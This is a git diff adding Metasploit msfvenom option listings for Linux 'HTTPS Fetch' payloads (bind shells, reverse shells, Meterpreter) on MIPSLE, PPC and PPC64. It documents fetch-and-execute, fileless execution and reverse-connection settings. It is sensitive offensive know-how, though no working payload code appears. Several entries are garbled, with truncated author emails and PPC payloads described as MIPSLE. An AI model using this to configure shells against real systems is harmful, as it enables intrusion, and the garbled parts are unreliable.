-------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-mipsle-shell_bind_tcp.txt b/msfvenom/payload_options/cmd-linux-https-mipsle-shell_bind_tcp.txt new file mode 100644 index 0000000..7f33004 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-mipsle-shell_bind_tcp.txt @@ -0,0 +1,79 @@ + + Name: HTTPS Fetch, Linux Command Shell, Bind TCP Inline + Module: payload/cmd/linux/https/mipsle/shell_bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 107 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + scut + vaicebine + Vlatko Kosturjak + juan vazquez + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME aplZKBCxH no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from an HTTPS server. + Listen for a connection and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-mipsle-shell_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-mipsle-shell_reverse_tcp.txt new file mode 100644 index 0000000..fb8379d --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-mipsle-shell_reverse_tcp.txt @@ -0,0 +1,84 @@ + + Name: HTTPS Fetch, Linux Command Shell, Reverse TCP Inline + Module: payload/cmd/linux/https/mipsle/shell_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 113 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + rigan + juan vazquez + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME EzswaLOmXPJ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from an HTTPS server. + Connect back to attacker and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-ppc-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-https-ppc-meterpreter_reverse_http.txt new file mode 100644 index 0000000..6b4522b --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-ppc-meterpreter_reverse_http.txt @@ -0,0 +1,109 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/ppc/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 110 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/https/ppc/meterpreter_reverse_http: +========================= + +nt_cook@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME AQlXodhLzr no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-ppc-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-https-ppc-meterpreter_reverse_https.txt new file mode 100644 index 0000000..67a2800 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-ppc-meterpreter_reverse_https.txt @@ -0,0 +1,111 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/ppc/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 104 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/https/ppc/meterpreter_reverse_https: +========================= + +_cook@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME AgJNQPAl no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-ppc-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-ppc-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..fd40553 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-ppc-meterpreter_reverse_tcp.txt @@ -0,0 +1,103 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/ppc/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 104 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/https/ppc/meterpreter_reverse_tcp: +========================= + +rent_cook@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME KETeARbr no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-ppc64-shell_bind_tcp.txt b/msfvenom/payload_options/cmd-linux-https-ppc64-shell_bind_tcp.txt new file mode 100644 index 0000000..16c9803 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-ppc64-shell_bind_tcp.txt @@ -0,0 +1,83 @@ + + Name: HTTPS Fetch, Linux Command Shell, Bind TCP Inline + Module: payload/cmd/linux/https/ppc64/shell_bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 0 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Ramon de C Valle + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME pNVqAnhCzXPG no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an PPC64 payload from an HTTPS server. + Listen for a connection and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependSetgid false no Prepend a stub that executes the 